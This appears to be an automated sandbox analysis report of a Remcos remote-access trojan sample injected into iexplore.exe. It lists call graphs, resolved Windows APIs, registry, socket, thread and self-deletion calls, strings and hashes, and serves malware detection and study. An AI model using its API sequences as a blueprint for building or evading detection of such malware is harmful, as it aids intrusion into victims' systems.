28 API calls __EH_prolog 48157->48163 48160 402813 48158->48160 48161 402252 11 API calls 48158->48161 48160->48149 48161->48160 48163->48160 48165->47725 48167 402347 48166->48167 48168 402252 11 API calls 48167->48168 48169 4023c7 48168->48169 48169->47725 48171 4024f9 48170->48171 48172 40250a 28 API calls 48171->48172 48173 4020b1 48172->48173 48173->47455 48190 43ba0a 48174->48190 48176 43ae50 48196 43a7b7 36 API calls 2 library calls 48176->48196 48178 43ae15 48178->48176 48179 43ae2a 48178->48179 48189 43ae2f __wsopen_s 48178->48189 48195 4405dd 20 API calls __dosmaperr 48179->48195 48182 43ae5c 48183 43ae8b 48182->48183 48197 43ba4f 40 API calls __Tolower 48182->48197 48186 43aef7 48183->48186 48198 43b9b6 20 API calls 2 library calls 48183->48198 48199 43b9b6 20 API calls 2 library calls 48186->48199 48187 43afbe _strftime 48187->48189 48200 4405dd 20 API calls __dosmaperr 48187->48200 48189->47754 48191 43ba22 48190->48191 48192 43ba0f 48190->48192 48191->48178 48201 4405dd 20 API calls __dosmaperr 48192->48201 48194 43ba14 __wsopen_s 48194->48178 48195->48189 48196->48182 48197->48182 48198->48186 48199->48187 48200->48189 48201->48194 48208 401fb0 48202->48208 48204 402f1e 48205 402055 11 API calls 48204->48205 48206 402f2d 48205->48206 48206->47768 48207->47771 48209 4025f0 28 API calls 48208->48209 48210 401fbd 48209->48210 48210->48204 48212 40a127 48211->48212 48213 413549 3 API calls 48212->48213 48214 40a12e 48213->48214 48215 40a142 48214->48215 48216 40a15c 48214->48216 48217 409e9b 48215->48217 48218 40a147 48215->48218 48234 40905c 28 API calls 48216->48234 48217->47507 48232 40905c 28 API calls 48218->48232 48221 40a16a 48235 40a179 86 API calls 48221->48235 48222 40a155 48233 40a22d 29 API calls 48222->48233 48225 40a15a 48225->48217 48226->47795 48240 403222 48227->48240 48229 403022 48244 403262 48229->48244 48232->48222 48233->48225 48236 40a273 163 API calls 48233->48236 48234->48221 48235->48217 48237 40a267 86 API calls 48235->48237 48238 40a289 48 API calls 48235->48238 48239 40a27d 128 API calls 48235->48239 48241 40322e 48240->48241 48250 403618 48241->48250 48243 40323b 48243->48229 48245 40326e 48244->48245 48246 402252 11 API calls 48245->48246 48247 403288 48246->48247 48248 402336 11 API calls 48247->48248 48249 403031 48248->48249 48249->47800 48251 403626 48250->48251 48252 403644 48251->48252 48253 40362c 48251->48253 48255 40369e 48252->48255 48257 40365c 48252->48257 48261 4036a6 28 API calls 48253->48261 48262 4028a4 22 API calls 48255->48262 48259 4027e6 28 API calls 48257->48259 48260 403642 48257->48260 48259->48260 48260->48243 48261->48260 48264 404186 48263->48264 48265 402252 11 API calls 48264->48265 48266 404191 48265->48266 48274 4041bc 48266->48274 48269 4042fc 48286 404353 48269->48286 48271 40430a 48272 403262 11 API calls 48271->48272 48273 404319 48272->48273 48273->47810 48275 4041c8 48274->48275 48278 4041d9 48275->48278 48277 40419c 48277->48269 48279 4041e9 48278->48279 48280 404206 48279->48280 48281 4041ef 48279->48281 48282 4027e6 28 API calls 48280->48282 48285 404267 28 API calls 48281->48285 48284 404204 48282->48284 48284->48277 48285->48284 48287 40435f 48286->48287 48290 404371 48287->48290 48289 40436d 48289->48271 48291 40437f 48290->48291 48292 404385 48291->48292 48293 40439e 48291->48293 48356 4034e6 28 API calls 48292->48356 48294 402888 22 API calls 48293->48294 48295 4043a6 48294->48295 48297 404419 48295->48297 48298 4043bf 48295->48298 48357 4028a4 22 API calls 48297->48357 48301 4027e6 28 API calls 48298->48301 48309 40439c 48298->48309 48301->48309 48309->48289 48356->48309 48364 43aa9a 48358->48364 48362 4138b9 48361->48362 48363 41388f RegSetValueExA RegCloseKey 48361->48363 48362->47826 48363->48362 48367 43aa1b 48364->48367 48366 40170d 48366->47824 48368 43aa2a 48367->48368 48370 43aa3e 48367->48370 48373 4405dd 20 API calls __dosmaperr 48368->48373 48372 43aa2f __alldvrm __wsopen_s 48370->48372 48374 448957 11 API calls 2 library calls 48370->48374 48372->48366 48373->48372 48374->48372 48378 41b8f9 ctype ___scrt_fastfail 48375->48378 48376 402093 28 API calls 48377 414f49 48376->48377 48377->47832 48378->48376 48379->47849 48381 414f02 getaddrinfo WSASetLastError 48380->48381 48382 414ef8 48380->48382 48381->47881 48439 414d86 29 API calls ___std_exception_copy 48382->48439 48384 414efd 48384->48381 48386 404846 socket 48385->48386 48387 404839 48385->48387 48388 404860 CreateEventW 48386->48388 48389 404842 48386->48389 48440 40489e WSAStartup 48387->48440 48388->47881 48389->47881 48391 40483e 48391->48386 48391->48389 48393 404f65 48392->48393 48394 404fea 48392->48394 48395 404f6e 48393->48395 48396 404fc0 CreateEventA CreateThread 48393->48396 48397 404f7d GetLocalTime 48393->48397 48394->47910 48395->48396 48396->48394 48443 405150 48396->48443 48441 41bb8e 28 API calls 48397->48441 48399 404f91 48442 4052fd 28 API calls 48399->48442 48408 404e40 SetEvent CloseHandle 48407->48408 48409 404e57 closesocket 48407->48409 48410 404ed8 48408->48410 48411 404e64 48409->48411 48410->47881 48412 404e73 48411->48412 48413 404e7a 48411->48413 48454 4050e4 84 API calls 48412->48454 48415 404e8c WaitForSingleObject 48413->48415 48416 404ece SetEvent CloseHandle 48413->48416 48447 420ca0 48415->48447 48416->48410 48419 420ca0 3 API calls 48420 404eb3 SetEvent FindCloseChangeNotification FindCloseChangeNotification 48419->48420 48420->48416 48421->47881 48422->47881 48424->47910 48425->47910 48426->47910 48427->47910 48428->47910 48429->47910 48430->47910 48431->47910 48432->47910 48433->47910 48434->47910 48435->47910 48436->47910 48437->47910 48438->47910 48439->48384 48440->48391 48441->48399 48446 40515c 102 API calls 48443->48446 48445 405159 48446->48445 48448 41e711 48447->48448 48449 404e9b SetEvent WaitForSingleObject 48447->48449 48450 41e71f 48448->48450 48455 41d85b DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48448->48455 48449->48419 48456 41e441 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48450->48456 48453 41e726 48454->48413 48455->48450 48456->48453 48459 401f8e 48458->48459 48460 402252 11 API calls 48459->48460 48461 401f99 48460->48461 48461->47941 48461->47942 48461->47944 48462->47949 48463->47974 48464->47973 48465->47963 48466->47968 48467->47975 48470 40f7c2 48468->48470 48469 413549 3 API calls 48469->48470 48470->48469 48471 40f866 48470->48471 48473 40f856 Sleep 48470->48473 48490 40f7f4 48470->48490 48504 40905c 28 API calls 48471->48504 48473->48470 48475 40f871 48478 41bc5e 28 API calls 48475->48478 48477 41bc5e 28 API calls 48477->48490 48479 40f87d 48478->48479 48505 413814 14 API calls 48479->48505 48482 401f09 11 API calls 48482->48490 48483 40f890 48484 401f09 11 API calls 48483->48484 48486 40f89c 48484->48486 48485 402093 28 API calls 48485->48490 48487 402093 28 API calls 48486->48487 48488 40f8ad 48487->48488 48491 41376f 14 API calls 48488->48491 48489 41376f 14 API calls 48489->48490 48490->48473 48490->48477 48490->48482 48490->48485 48490->48489 48501 40d096 112 API calls ___scrt_fastfail 48490->48501 48502 40905c 28 API calls 48490->48502 48503 413814 14 API calls 48490->48503 48492 40f8c0 48491->48492 48506 412850 TerminateProcess WaitForSingleObject 48492->48506 48494 40f8c8 ExitProcess 48507 4127ee 62 API calls 48495->48507 48502->48490 48503->48490 48504->48475 48505->48483 48506->48494 48508 41dfbd 48509 41dfd2 ctype ___scrt_fastfail 48508->48509 48510 41e1d5 48509->48510 48527 432ec4 21 API calls new 48509->48527 48516 41e189 48510->48516 48522 41db62 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 48510->48522 48513 41e1e6 48513->48516 48523 432ec4 21 API calls new 48513->48523 48515 41e182 ___scrt_fastfail 48515->48516 48528 432ec4 21 API calls new 48515->48528 48518 41e21f ___scrt_fastfail 48518->48516 48524 43354a 48518->48524 48520 41e1af ___scrt_fastfail 48520->48516 48529 432ec4 21 API calls new 48520->48529 48522->48513 48523->48518 48530 433469 48524->48530 48526 433552 48526->48516 48527->48515 48528->48520 48529->48510 48531 433482 48530->48531 48532 433478 48530->48532 48531->48532 48536 432ec4 21 API calls new 48531->48536 48532->48526 48534 4334a3 48534->48532 48537 433837 CryptAcquireContextA 48534->48537 48536->48534 48538 433858 CryptGenRandom 48537->48538 48539 433853 48537->48539 48538->48539 48540 43386d CryptReleaseContext 48538->48540 48539->48532 48540->48539

              Control-flow Graph

              APIs
              • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
              • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
              • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
              • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
              • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
              • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
              • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
              • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
              • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
              • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
              • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
              • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
              • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
              • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
              • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
              • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
              • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
              • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
              • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
              • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
              • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
              • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
              • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
              • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
              • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
              • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
              • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
              • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
              • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
              • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
              • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
              • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
              • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
              • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
              • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
              • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
              • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
              • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$LibraryLoad$HandleModule
              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
              • API String ID: 4236061018-3687161714
              • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
              • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
              • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
              • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

              Control-flow Graph

              APIs
                • Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00413569
                • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                • Part of subcall function 00413549: RegCloseKey.ADVAPI32(?), ref: 00413592
              • Sleep.KERNELBASE(00000BB8), ref: 0040F85B
              • ExitProcess.KERNEL32 ref: 0040F8CA
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseExitOpenProcessQuerySleepValue
              • String ID: 5.0.0 Pro$override$pth_unenc
              • API String ID: 2281282204-3992771774
              • Opcode ID: 0f0f128e8fcf968847a19cc91f7e634e3430a83fc762b12943e079f85eeec929
              • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
              • Opcode Fuzzy Hash: 0f0f128e8fcf968847a19cc91f7e634e3430a83fc762b12943e079f85eeec929
              • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1071 404f51-404f5f 1072 404f65-404f6c 1071->1072 1073 404fea 1071->1073 1075 404f74-404f7b 1072->1075 1076 404f6e-404f72 1072->1076 1074 404fec-404ff1 1073->1074 1077 404fc0-404fe8 CreateEventA CreateThread 1075->1077 1078 404f7d-404fbb GetLocalTime call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1075->1078 1076->1077 1077->1074 1078->1077
              APIs
              • GetLocalTime.KERNEL32(?), ref: 00404F81
              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
              • CreateThread.KERNELBASE(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
              Strings
              • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Create$EventLocalThreadTime
              • String ID: KeepAlive | Enabled | Timeout:
              • API String ID: 2532271599-1507639952
              • Opcode ID: 27b858f6950e3623d995e23d6d4fe1d77f4f118926dc16c8cee4ff6bd928c013
              • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
              • Opcode Fuzzy Hash: 27b858f6950e3623d995e23d6d4fe1d77f4f118926dc16c8cee4ff6bd928c013
              • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1105 433837-433851 CryptAcquireContextA 1106 433853 1105->1106 1107 433858-433867 CryptGenRandom 1105->1107 1108 433855-433856 1106->1108 1109 433869-43386b 1107->1109 1110 43386d-433877 CryptReleaseContext 1107->1110 1111 433879-43387b 1108->1111 1109->1108 1110->1111
              APIs
              • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00C6CC08), ref: 00433849
              • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
              • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Crypt$Context$AcquireRandomRelease
              • String ID:
              • API String ID: 1815803762-0
              • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
              • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
              • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
              • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C

              Control-flow Graph

              APIs
              • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: NameUser
              • String ID:
              • API String ID: 2645101109-0
              • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
              • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
              • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
              • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 100 40f34f-40f36a call 401fab call 4139a9 call 412475 69->100 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 88 40ec13-40ec1a 79->88 89 40ec0c-40ec0e 79->89 80->79 99 40ebec-40ec02 call 401fab call 4139a9 80->99 94 40ec1c 88->94 95 40ec1e-40ec2a call 41b2c3 88->95 93 40eef1 89->93 93->49 94->95 104 40ec33-40ec37 95->104 105 40ec2c-40ec2e 95->105 99->79 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 100->126 108 40ec76-40ec89 call 401e65 call 401fab 104->108 109 40ec39-40ec40 call 407716 104->109 105->104 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 120 40ec42-40ec47 call 407738 call 407260 109->120 121 40ec4c-40ec5f call 401e65 call 401fab 109->121 120->121 121->108 141 40ec61-40ec67 121->141 156 40f3a5-40f3af call 40dd42 call 414f2a 126->156 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 141->108 144 40ec69-40ec6f 141->144 144->108 147 40ec71 call 407260 144->147 147->108 180 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->180 181 40ed8a-40ed91 177->181 178->177 204 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->204 234 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 180->234 183 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 181->183 184 40ee0f-40ee19 call 409057 181->184 190 40ee1e-40ee42 call 40247c call 434798 183->190 184->190 211 40ee51 190->211 212 40ee44-40ee4f call 436e90 190->212 204->177 217 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 211->217 212->217 272 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 217->272 286 40efc1 234->286 287 40efdc-40efde 234->287 272->234 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 272->288 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->234 306 40eeef 288->306 295 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->295 290->289 291->295 344 40f101 295->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 295->345 306->93 346 40f103-40f11b call 401e65 call 401fab 344->346 345->346 357 40f159-40f16c call 401e65 call 401fab 346->357 358 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 346->358 367 40f1cc-40f1df call 401e65 call 401fab 357->367 368 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 357->368 358->357 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 367->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 367->380 368->367 379->380 400 40f240-40f241 SetProcessDEPPolicy 380->400 401 40f243-40f256 CreateThread 380->401 400->401 405 40f264-40f26b 401->405 406 40f258-40f262 CreateThread 401->406 410 40f279-40f280 405->410 411 40f26d-40f277 CreateThread 405->411 406->405 412 40f282-40f285 410->412 413 40f28e 410->413 411->410 415 40f287-40f28c 412->415 416 40f2cc-40f2e7 call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 416->156 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 416->427 418->416 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
              APIs
                • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
              • GetModuleFileNameW.KERNEL32(00000000,C:\Program Files (x86)\Internet Explorer\iexplore.exe,00000104), ref: 0040E9EE
                • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
              • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Program Files (x86)\Internet Explorer\iexplore.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
              • API String ID: 2830904901-506719542
              • Opcode ID: 5f86444c0e0d6fb830e36ac24550cef759593a2ba7ded1b6d17afb6240a520cb
              • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
              • Opcode Fuzzy Hash: 5f86444c0e0d6fb830e36ac24550cef759593a2ba7ded1b6d17afb6240a520cb
